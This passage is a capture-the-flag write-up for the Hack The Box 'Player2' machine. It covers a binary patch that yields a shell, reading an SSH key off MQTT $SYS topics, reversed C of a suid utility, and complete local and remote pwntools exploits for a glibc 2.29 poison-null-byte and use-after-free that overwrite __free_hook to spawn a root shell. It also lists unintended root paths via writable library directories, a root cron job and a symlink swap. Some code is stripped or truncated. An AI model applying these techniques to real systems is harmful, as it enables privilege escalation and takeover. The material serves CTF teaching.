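The 8420 offset is consistent with the disassembly above. radare2 places the string at 0x4020a4. Assuming the segment holding it is mapped at 0x402000 from file offset 0x2000 inside the ELF (typical for this non-PIE layout, but check with readelf -l), the string sits at 0x20a4 = 8356 in the bare ELF, and adding the 64-byte signature gives 8420. The sketch below does the same in-place patch in Python with a length check. NUL-padding the leftover bytes is my own choice (the dd command does not pad); the helper names are hypothetical.

```python
SIG_LEN = 64
OLD = b"stty raw -echo min 0 time 10"  # 28 bytes, the most our payload may use

def vaddr_to_file_offset(vaddr: int, seg_vaddr: int, seg_offset: int, sig_len: int = SIG_LEN) -> int:
    """Map a virtual address to an offset in the signed image (signature prefix included)."""
    return sig_len + seg_offset + (vaddr - seg_vaddr)

def patch_string(blob: bytes, offset: int, new: bytes, old_len: int) -> bytes:
    """Overwrite the old_len-byte string at offset with new, NUL-padded, without growing it."""
    if len(new) > old_len:
        raise ValueError("replacement is longer than the original string")
    padded = new + b"\x00" * (old_len - len(new))
    return blob[:offset] + padded + blob[offset + old_len:]

# Assumed segment mapping: vaddr 0x402000 <- file offset 0x2000 inside the ELF.
OFFSET = vaddr_to_file_offset(0x4020a4, 0x402000, 0x2000)
```

Applying it is a matter of reading Protobs.bin, calling patch_string(blob, OFFSET, payload, len(OLD)) with your own short command, and writing the result back; the signature bytes are never touched.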

Uploading this should pop us a shell back as www-data.
Looking in /etc/passwd, there are two potential users to go for: egre55 and observer. There is also an account for the mosquitto service, which is running on port 1883. Reading around, its $SYS topics looked especially interesting.

To quote the article, SYS topics are a special class of topics under which the broker publishes data, typically for monitoring purposes. SYS topics are not a formal standard but are an established practice in MQTT brokers.

Subscribing to them with the following command:
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#'

After a while, we see an SSH key get dumped:


I tried the key against both users, and it works for observer. User has now been pwned!
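Why subscribe to '$SYS/#' instead of just '#'? Under MQTT 3.1.1's topic-matching rules, '#' matches any number of levels and '+' matches exactly one, but a filter that starts with a wildcard must not match topic names beginning with '$'. So $SYS topics only show up when requested explicitly. A minimal sketch of those rules (my own implementation, not mosquitto's code):

```python
def topic_matches(topic_filter: str, topic: str) -> bool:
    """MQTT 3.1.1-style matching: '+' matches one level, '#' matches the remaining levels."""
    # Filters starting with a wildcard must not match topics beginning with '$' (e.g. $SYS).
    if topic.startswith("$") and topic_filter[:1] in ("#", "+"):
        return False
    f_levels = topic_filter.split("/")
    t_levels = topic.split("/")
    for i, level in enumerate(f_levels):
        if level == "#":
            return True              # also matches the parent level, e.g. "sport/#" vs "sport"
        if i >= len(t_levels):
            return False
        if level != "+" and level != t_levels[i]:
            return False
    return len(f_levels) == len(t_levels)
```

For example, topic_matches("#", "$SYS/broker/uptime") is False while topic_matches("$SYS/#", "$SYS/broker/uptime") is True, which is why the command above names $SYS explicitly.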

Finally, we have reached the root part. It's a poison null byte on glibc 2.29 (there was also an easier, unintended heap overflow). Make sure to read up on malloc.c for 2.29 on bminor's mirror of the glibc source before continuing! The binary can be found in /opt/Configuration_Utility, and running checksec on it immediately shows that it has been patchelf'd to use an ld and libc different from the box's defaults. Personally, I like to use all of pwndbg's capabilities with libc debug symbols, so I ran the following commands to switch the interpreter and rpath back to the defaults and debugged on a headless Ubuntu VM running the same libc version:

patchelf Protobs --set-interpreter /lib64/
patchelf Protobs --remove-rpath /lib/x86_64-linux-gnu/

Anyway, let's begin the pwning! Here is the reversed binary with my comments:

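//only 15 indices

typedef struct {
  char game[20];             // 0x00
  unsigned int contrast;     // 0x14
  unsigned int gamma;        // 0x18
  unsigned int xres;         // 0x1c
  unsigned int yres;         // 0x20
  unsigned int controller;   // 0x24
  unsigned int desc;         // 0x28, description size
  char *description;         // 0x30
} config;                    // sizeof == 0x38; the typedef name is my own label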

void create(void)
{
  char *__dest;
  long lVar1;
  int iVar2;
  undefined4 uVar3;
  void *pvVar4;
  ssize_t sVar5;
  size_t sVar6;
  long in_FS_OFFSET;
  int local_448;
  char local_428 [19];
  undefined local_415;
  long local_20;

  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  iVar2 = FUN_00400c8b();
  if (iVar2 < 0) {
    /* ... (not shown in the original listing) ... */
  }
  else {
    pvVar4 = malloc(0x38); //so by default this lands in the 0x40 tcache bin, note libc 2.29
    *(void **)(&DAT_00603060 + (long)iVar2 * 8) = pvVar4;
    __dest = *(char **)(&DAT_00603060 + (long)iVar2 * 8);
    puts("==New Game Configuration");
    printf(" [ Game                ]: ");
    /* ... game name read into local_428 (not shown in the original listing) ... */
    local_415 = 0;
    /* ... game name stored at __dest (not shown in the original listing) ... */
    uVar3 = readnum(" [ Contrast            ]: ");
    *(undefined4 *)(__dest + 0x14) = uVar3;
    uVar3 = readnum(" [ Gamma               ]: ");
    *(undefined4 *)(__dest + 0x18) = uVar3;
    uVar3 = readnum(" [ Resolution X-Axis   ]: ");
    *(undefined4 *)(__dest + 0x1c) = uVar3;
    uVar3 = readnum(" [ Resolution Y-Axis   ]: ");
    *(undefined4 *)(__dest + 0x20) = uVar3;
    uVar3 = readnum(" [ Controller          ]: ");
    *(undefined4 *)(__dest + 0x24) = uVar3;
    uVar3 = readnum(" [ Size of Description ]: "); //not nulled out, another bug here!
    *(undefined4 *)(__dest + 0x28) = uVar3;
    if (*(int *)(__dest + 0x28) != 0) {
      printf(" [ Description         ]: ");
      sVar5 = read(0,local_428,0x200);
      if (*(uint *)(__dest + 0x28) <= (uint)sVar5) {
        local_428[(ulong)*(uint *)(__dest + 0x28)] = 0;
      }
      pvVar4 = malloc((ulong)*(uint *)(__dest + 0x28));
      *(void **)(__dest + 0x30) = pvVar4; //another allocation
      lVar1 = *(long *)(__dest + 0x30);
      local_448 = 0;
      while( true ) {
        sVar6 = strlen(local_428); //counts all the way till null byte
        //what happened above allows for poison null byte: it copies strlen + 1 bytes rather than desc size bytes
        if (sVar6 < (ulong)(long)local_448) break;
        *(char *)((long)local_448 + lVar1) = local_428[(long)local_448];
        local_448 = local_448 + 1;
      }
    }
  }
  if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void delete(void)
{
  long lVar1;
  void *__ptr;
  uint uVar2;
  long in_FS_OFFSET;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==Delete Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar2 = readnum(" [ Config Index    ]: ");
  if ((uVar2 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar2 * 8) != 0)) {
    __ptr = *(void **)(&DAT_00603060 + (ulong)uVar2 * 8);
    if (*(long *)((long)__ptr + 0x30) != 0) {
      free(*(void **)((long)__ptr + 0x30)); //description freed first
    }
    free(__ptr); //game struct freed, but its description pointer at +0x30 is never cleared
    *(undefined8 *)(&DAT_00603060 + (ulong)uVar2 * 8) = 0;
  }
  else {
    puts("  [!] Invalid index.");
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void readin(char *pcParm1)
{
  long lVar1;
  char *pcVar2;
  long in_FS_OFFSET;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strchr(pcParm1,0xd);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  pcVar2 = strchr(pcParm1,10);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

ulong readnum(char *pcParm1)
{
  ulong uVar1;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  /* ... prompt printed and number read into local_28 (not shown in the original listing) ... */
  uVar1 = strtol(local_28,(char **)0x0,10);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar1 & 0xffffffff;
}

void show(void)
{
  long lVar1;
  long lVar2;
  uint uVar3;
  long in_FS_OFFSET;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==Read Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar3 = readnum(" [ Config Index    ]: ");
  if ((uVar3 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar3 * 8) != 0)) {
    lVar2 = *(long *)(&DAT_00603060 + (ulong)uVar3 * 8);
    printf("  [ Game                ]: %s\n",lVar2);
    printf("  [ Contrast            ]: %u\n",(ulong)*(uint *)(lVar2 + 0x14));
    printf("  [ Gamma               ]: %u\n",(ulong)*(uint *)(lVar2 + 0x18));
    printf("  [ Resolution X-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x1c));
    printf("  [ Resolution Y-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x20));
    printf("  [ Controller          ]: %u\n",(ulong)*(uint *)(lVar2 + 0x24));
    if (*(long *)(lVar2 + 0x30) != 0) {
      printf("  [ Description         ]: %s\n",*(undefined8 *)(lVar2 + 0x30));
    }
  }
  else {
    puts("  [!] Invalid index.");
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void list(void)
{
  long lVar1;
  long in_FS_OFFSET;
  uint local_1c;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==List of Configurations");
  local_1c = 0;
  while (local_1c < 0xf) {
    if (*(long *)(&DAT_00603060 + (ulong)local_1c * 8) != 0) {
      printf(" [%02u] : %s\n",(ulong)local_1c,*(undefined8 *)(&DAT_00603060 + (ulong)local_1c *8));
    }
    local_1c = local_1c + 1;
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void main(void)
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("protobs@player2:~$ ");
  switch(local_28[0]) {
  case '0':
  case '1':
  case '2':
  case '3':
  case '4':
  case '5':
    puts("[!] Invalid option. Enter \'0\' for available options.");
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

Basically, there are two bugs: a poison null byte and a UAF. The UAF exists because the game struct (a 0x38-byte allocation, so it belongs to the 0x40 tcache bin) does not have its description pointer zeroed out when it is freed, and create() only writes that pointer when the description size is non-zero. Therefore, we can make a game with a description, free it, get the same game chunk back with another allocation whose description size is 0, and show it: the stale pointer still points at the freed description. The poison null byte is in create() as well, due to the way it copies our description (note the comments in the listing): the description is null-terminated at the requested size, but the copy loop then writes strlen + 1 bytes, so a description exactly as long as the requested size puts a null byte one past the end of the buffer. For a size like 0x198, that byte lands on the lowest byte of the next chunk's size field. Using the UAF, we can grab both a heap and a libc leak. The heap leak comes from tcache pointers. The libc leak comes from unsorted bin pointers, which is easy since there is no upper limit on the allocation size: a large enough chunk (the exploit uses 0x500) skips tcache when freed and lands in the unsorted bin.
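To double-check the 0x40 claim, here is a small sketch that rebuilds the struct layout from the offsets in the listing with ctypes and applies glibc's request2size() rounding for x86-64. The class and field names are my own labels, and the sizeof check assumes a 64-bit host.

```python
import ctypes

class GameConfig(ctypes.Structure):
    # Layout reconstructed from the offsets used in create()/show(); names are my own.
    _fields_ = [
        ("game", ctypes.c_char * 20),      # 0x00
        ("contrast", ctypes.c_uint32),     # 0x14
        ("gamma", ctypes.c_uint32),        # 0x18
        ("xres", ctypes.c_uint32),         # 0x1c
        ("yres", ctypes.c_uint32),         # 0x20
        ("controller", ctypes.c_uint32),   # 0x24
        ("desc_size", ctypes.c_uint32),    # 0x28
        ("description", ctypes.c_void_p),  # 0x30, left stale after delete()
    ]

SIZE_SZ = 8
MALLOC_ALIGN_MASK = 0x10 - 1
MINSIZE = 0x20

def request2size(req: int) -> int:
    """glibc's request2size() on x86-64: add the size header and round up to 16."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
```

request2size(ctypes.sizeof(GameConfig)) gives 0x40, the bin the game structs cycle through; the same rounding turns the exploit's 0x198 and 0x4f0 descriptions into 0x1a0 and 0x500 chunks.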

As for the poison null byte, the concept is the same as in older poison null byte attacks. The only difference is that libc 2.29 adds the following check to backward consolidation in free:

    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

Bypassing this isn't too hard. Just forge a fake chunk with the correct size right before (at a lower address than) the region you want to coalesce with. Remember the prev_size issue from older poison null bytes too: the prev_size of the victim chunk determines where free looks for the previous chunk and how much it coalesces by! However, you will also need heap pointers that point back to the forged chunk to pass the classic unlink check that FD->bk == P and BK->fd == P.

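Below is the unlink macro from older glibc versions (2.29 performs the same checks in the unlink_chunk() function called above):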

#define unlink(AV, P, BK, FD) {                                            \
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))    \
      malloc_printerr ("corrupted size vs. prev_size");                     \
    FD = P->fd;                                                             \
    BK = P->bk;                                                             \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                   \
      malloc_printerr ("corrupted double-linked list");                     \
    else {                                                                  \
        FD->bk = BK;                                                        \
        BK->fd = FD;                                                        \
        /* ... fd_nextsize/bk_nextsize handling for large chunks ... */     \
      }                                                                     \
}
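To see why a self-referencing fake chunk gets through, here is a toy model that runs the backward-consolidation check and the unlink checks quoted above against a sparse word-addressed memory. It mirrors the layout the exploit builds (fake size 0x1d0, fd = bk = the fake chunk itself, matching prev_size on the victim); the addresses are hypothetical, and only the small-bin path is modelled.

```python
class ToyHeap:
    """Sparse 8-byte-word memory, just enough to run glibc's consolidation checks."""
    def __init__(self):
        self.mem = {}

    def q(self, addr: int) -> int:
        return self.mem.get(addr, 0)

    def set_q(self, addr: int, val: int) -> None:
        self.mem[addr] = val

def chunksize(h: ToyHeap, p: int) -> int:
    return h.q(p + 0x8) & ~0x7          # size field minus the three flag bits

def unlink_chunk(h: ToyHeap, p: int) -> None:
    """The checks from the unlink macro above (small-bin case, no nextsize handling)."""
    if chunksize(h, p) != h.q(p + chunksize(h, p)):          # prev_size(next_chunk(p))
        raise RuntimeError("corrupted size vs. prev_size")
    fd, bk = h.q(p + 0x10), h.q(p + 0x18)
    if h.q(fd + 0x18) != p or h.q(bk + 0x10) != p:          # FD->bk != P || BK->fd != P
        raise RuntimeError("corrupted double-linked list")
    h.set_q(fd + 0x18, bk)
    h.set_q(bk + 0x10, fd)

def consolidate_backward(h: ToyHeap, victim: int) -> int:
    """The _int_free snippet quoted earlier: merge victim with the chunk prev_size bytes below."""
    if h.q(victim + 0x8) & 1:
        raise RuntimeError("PREV_INUSE is set; nothing to consolidate")
    prevsize = h.q(victim)
    p = victim - prevsize
    if chunksize(h, p) != prevsize:
        raise RuntimeError("corrupted size vs. prev_size while consolidating")
    unlink_chunk(h, p)
    return p

# Hypothetical addresses: P plays the role of heapleak + 0xa50 in the exploit.
P = 0x555555559a50
FAKE_SIZE = 0x1d0
h = ToyHeap()
h.set_q(P + 0x8, FAKE_SIZE)      # forged size
h.set_q(P + 0x10, P)             # fd = P
h.set_q(P + 0x18, P)             # bk = P, so FD->bk == P and BK->fd == P
victim = P + FAKE_SIZE
h.set_q(victim, FAKE_SIZE)       # forged prev_size
h.set_q(victim + 0x8, 0x500)     # size after the null byte cleared PREV_INUSE
print(hex(consolidate_backward(h, victim)))
```

Pointing fd anywhere else (without a matching back pointer) makes the same call fail with "corrupted double-linked list", which is why the exploit spends a few allocations writing heapleak + 0xa50 into both slots.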

Somehow I missed the really obvious massive heap overflow caused by the buffer reuse, as sampriti, R4J, and hevr pointed out. The name and the description are read into the same place on the stack, but the fgets for the name accepts far more data (0x400 bytes) than the read for the description (capped at 0x200). If we first send a long name and then a description shorter than the size we declared, the description never gets its null terminator, so the strlen-based copy keeps going into the leftover name bytes and overflows the heap chunk massively. From there, the classic tcache tricks should give an arbitrary write. This method of exploitation would have been much simpler.
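Both bugs fall out of the same copy logic, so a small model of create()'s buffer handling makes them concrete. This is a sketch based on the decompiled listing and on the 0x400-byte fgets mentioned above; simulate_create is a hypothetical helper that returns how many bytes reach the heap and how far past the requested size they go. Note the local_415 = 0 store: it puts a null at offset 19 of the name, so the description must be at least 20 bytes long to reach the leftover name.

```python
def simulate_create(name: bytes, desc: bytes, desc_size: int, buf_size: int = 0x400):
    """Return (bytes copied to the heap, overflow past desc_size) for one create() call."""
    buf = bytearray(buf_size)
    name = name[:buf_size - 1]                 # fgets keeps room for its NUL
    buf[:len(name)] = name
    buf[len(name)] = 0
    buf[19] = 0                                # local_415 = 0 truncates the stored game name
    desc = desc[:0x200]                        # read() is capped at 0x200
    buf[:len(desc)] = desc
    if desc_size <= len(desc):
        buf[desc_size] = 0                     # only terminated when read() returned >= size
    n = buf.index(0)                           # strlen(local_428)
    copied = n + 1                             # the copy loop also writes the terminating NUL
    return copied, max(0, copied - desc_size)
```

A description that exactly fills its size gives the intended off-by-one (simulate_create(b"game", b"D" * 0x100, 0x100) returns (0x101, 1)), while a 0x300-byte name followed by a 0x40-byte description declared as 0x100 returns (0x301, 0x201), the large unintended overflow.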

After that, you should be able to coalesce, get heap overlap, and pop a shell. Now let's write the exploit. If you were not able to solve this, make sure to debug along!

The first thing I did was write all the helper functions:

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./')

p = process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
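def wait():
    ...  # body not included in the original post

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    if size != 0:
        ...  # rest of the body not included in the original post

def free(index):
    ...  # body not included in the original post

def show(index):
    ...  # body not included in the original post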

Then I got a heap and a libc leak using the UAF bug above. It is important to keep track of how many chunks are left in the 0x40 tcache bin and to try to keep it filled up, especially before the poison null byte, so that they do not interfere with your poison null byte setup. Hopefully, my comments below will help clear up any confusion.

small = 0x198
big = 0x4f0 #500
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak))
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak - 0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address))
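The libc arithmetic works because a chunk alone in the unsorted bin has fd and bk pointing at the bin's header inside main_arena, 96 bytes (0x60) past main_arena on x86-64. Here is a pwntools-free sketch of the same parsing and base calculation, using the 0x1e4c40 main_arena offset from the exploit (specific to the box's libc). The page-alignment check is my own sanity guard, and since show() prints with %s, a leak containing a null byte in its low bytes would come back truncated.

```python
import struct

MAIN_ARENA_OFF = 0x1e4c40  # main_arena offset in the box's libc 2.29, as used above
UNSORTED_FD_OFF = 96       # unsorted bin fd/bk point at main_arena + 0x60

def parse_leak(line: bytes) -> int:
    """Turn the bytes printed by show() (newline stripped, cut at the first NUL) into an int."""
    return struct.unpack("<Q", line.ljust(8, b"\x00"))[0]

def libc_base_from_unsorted(leak: int) -> int:
    """Subtract the unsorted-bin offset and refuse results that are not page-aligned."""
    base = leak - MAIN_ARENA_OFF - UNSORTED_FD_OFF
    if base & 0xfff:
        raise ValueError("libc base is not page-aligned; the offset is probably wrong")
    return base
```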

As I mentioned earlier, I prefer to keep the 0x40 tcache bin (used by the game metadata structs) full so that it does not interfere with my poison null byte setup.

#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    ...  # loop body not included in the original post; afterwards there are 7 chunks in the 0x40 tcache
#tcache should be filled now

Now it's time for the poison null byte. Just remember what I said before and you should be fine. One thing to note is the size I chose to overwrite: I allocated 0x4f0 so that the chunk size becomes 0x500. Not only does this avoid having to fill its tcache bin before it goes through the coalesce/unsorted bin path (0x500 is too large for tcache), but the null byte also just turns the size field from 0x501 (PREV_INUSE set) into 0x500. This way, I won't have to deal with the libc checks on the chunks that follow, as the size did not actually change. Also, because the allocation function only copies up to the first null byte, you have to write values containing null bytes (such as the fake size and prev_size) slowly, working backwards byte by byte: each shorter write's terminating null clears one more byte. You will also need to make sure you have a freed chunk in the coalesced region to create heap overlap afterwards.

#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    alloc(0x50, 'C' * (0x30-i-1))
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
for i in range(6):
    alloc(small, 'F' * (small-i-1))
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(4) #chunk coalesced now
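The backwards byte-by-byte trick in the prev_size writes above is easier to follow in a model. This sketch replays the exploit's writes on a bytearray standing in for the 0x1a0 chunk, assuming (since the helper bodies are not shown) that each alloc(small, ...) gets the same chunk back. The first write is the off-by-one that turns 0x501 into 0x500, the loop's terminating nulls clear the high bytes one at a time, and the last write drops 0x1d0 into the low bytes.

```python
import struct

SMALL = 0x198                  # description size used in the exploit (0x1a0 chunk)
FAKE_PREV_SIZE = SMALL + 0x38  # 0x1d0: distance from the forged chunk to the victim

def strlen_copy(region: bytearray, data: bytes) -> None:
    """Model create()'s copy loop: bytes up to the first NUL, plus that terminating NUL."""
    n = data.find(b"\x00")
    if n == -1:
        n = len(data)
    region[:n + 1] = data[:n] + b"\x00"

# User area of the 0x1a0 chunk (0x198 bytes; the last 8 double as the next chunk's
# prev_size), followed by the two low bytes of the next chunk's size field, 0x501.
region = bytearray(b"X" * SMALL) + bytearray(b"\x01\x05")

strlen_copy(region, b"F" * SMALL)                 # off-by-one NUL: size 0x501 -> 0x500
for i in range(6):
    strlen_copy(region, b"F" * (SMALL - i - 1))   # each copy's NUL clears one more byte
strlen_copy(region, b"F" * (SMALL - 8) + struct.pack("<Q", FAKE_PREV_SIZE))

prev_size = struct.unpack("<Q", region[SMALL - 8:SMALL])[0]
next_size = struct.unpack("<H", region[SMALL:SMALL + 2])[0]
print(hex(prev_size), hex(next_size))  # 0x1d0 0x500
```

The fake chunk's fd, bk and size in the 0x50 description are built the same way.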

Now you have a coalesced region and a free chunk pointing into the same region, which creates heap overlap. Technically, tcache poisoning by overwriting the fd pointers is trivial, but beware of the tcache count check. You can handle it by allocating several chunks of the same size and then freeing them all into the same tcache bin, so that when you poison the bin, the count is high enough that it never drops to -1 and the target region is still handed back. Then overwrite __free_hook with system and pop a shell by freeing a chunk that starts with a shell string, since you control the rdi value passed to free.

alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
#above was a tcache poison; the next 0x60 allocation lands on __free_hook
magic = [0xe237f, 0xe2383, 0xe2386] #one_gadget candidates, unused in the end
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/bash\x00') #9
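The reason for the extra 0x60 chunks can be shown with a toy tcache bin: a LIFO list of chunk addresses linked through their next fields, plus a count. The model enforces the count the way the writeup describes (a bin whose count has reached zero is not used), and the overlapping write is reduced to "overwrite the head's next pointer". Everything here, including the addresses, is hypothetical; the real frees happen inside helpers that are not shown.

```python
class ToyTcacheBin:
    """Toy LIFO tcache bin: chunk addresses linked through their `next` fields, plus a count."""
    def __init__(self):
        self.head = None
        self.count = 0
        self.next = {}                       # chunk address -> its `next` pointer

    def free(self, addr: int) -> None:
        self.next[addr] = self.head
        self.head = addr
        self.count += 1

    def malloc(self):
        """Serve from the bin only while the count is positive, as the writeup describes."""
        if self.count <= 0 or self.head is None:
            return None                      # falls through to the regular allocator
        addr = self.head
        self.head = self.next.get(addr)
        self.count -= 1
        return addr

def poison_and_drain(freed, target):
    """Free `freed`, overwrite the head's next pointer (the overlap write), then allocate twice."""
    tbin = ToyTcacheBin()
    for addr in freed:
        tbin.free(addr)
    tbin.next[tbin.head] = target            # what the overlapping chunk's write achieves
    return tbin.malloc(), tbin.malloc()
```

With three chunks freed, poison_and_drain([0x1000, 0x1070, 0x10e0], target) returns (0x10e0, target); with only one, the count hits zero after the first allocation and the second returns None, so the target is never handed out.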

For the remote version, I used pwntools' ssh support and slowed down the timing.

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./')

remoteShell = ssh(host = 'player2.htb', user='observer', keyfile='./key')
p = remoteShell.process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
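def wait():
    ...  # body not included in the original post

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    if size != 0:
        ...  # rest of the body not included in the original post

def free(index):
    ...  # body not included in the original post

def show(index):
    ...  # body not included in the original post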

small = 0x198
big = 0x4f0 #500
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak))
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak - 0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address)) #know that read maxes out at 0x200
#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    ...  # loop body not included in the original post; afterwards there are 7 chunks in the 0x40 tcache
#tcache should be filled now
#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    alloc(0x50, 'C' * (0x30-i-1))
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
for i in range(6):
    alloc(small, 'F' * (small-i-1))
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(4) #chunk coalesced now
alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/sh\x00') #9

And you should now have a root shell! During this box's lifetime, there were actually several other unintended and alternative paths that made it easier, one of which was the large heap overflow I mentioned above, which makes tcache poisoning trivial.

Another one, which D3v17 and I discovered early on while stracing the binary, was that because it had been patchelf'd, the loader searched ./tls/x86_64/x86_64/ and a few other local subdirectories before checking the directory itself for the libc file. We had write permissions and were able to create one of those directories containing a patched libc that redirected one of the program's function calls to just call system("/bin/sh"). This was patched later on.

Xct also took first root blood with an unintended path involving a cron job that executed Python files as root from a directory www-data could write to. These files were and from /var/www/product/protobs, opening up an easy gateway to root. This path was patched as well.

Lastly, here is one more unintended/alternative path I heard about from both D3v17 and xct. To quote D3v17: "A user can upload inotifywait (static binary) and then start monitoring /home folder using inotifywait -m -r /home. Inotifywait will show that /.ssh/id_rsa is opened,read and closed. So the user can replace id_rsa with a symlink to /root/root.txt and read the flag using mqtt."

Regardless, this box was still very fun! Congrats to b14ckh34rt and MrR3boot, who always produce engaging and exciting content!